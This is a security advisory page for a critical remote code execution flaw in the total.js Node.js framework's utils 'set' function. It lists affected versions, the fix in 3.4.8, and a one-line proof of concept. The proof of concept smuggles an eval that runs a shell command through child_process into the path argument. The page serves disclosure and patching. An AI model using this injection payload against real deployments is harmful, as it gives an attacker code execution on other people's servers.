VDB
KO
CRITICAL 9.8

GHSA-3wj8-vp9h-rm6m

total.js Remote Code Execution Vulnerability

Details

total.js is a framework for Node.js platfrom written in pure JavaScript similar to PHP's Laravel or Python's Django or ASP.NET MVC. It can be used as web, desktop, service or IoT application.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via `set`.

### PoC ```js // To be run in a nodejs console: require('total.js/utils').set({}, 'a;eval(`require("child_process")\\x2eexecSync("touch pwned")`);//') ```

Are you affected?

Enter the version of the package you're using.

Affected packages

npm / total.js
Introduced in: 0 Fixed in: 3.4.8
Fix npm install total.js@3.4.8

References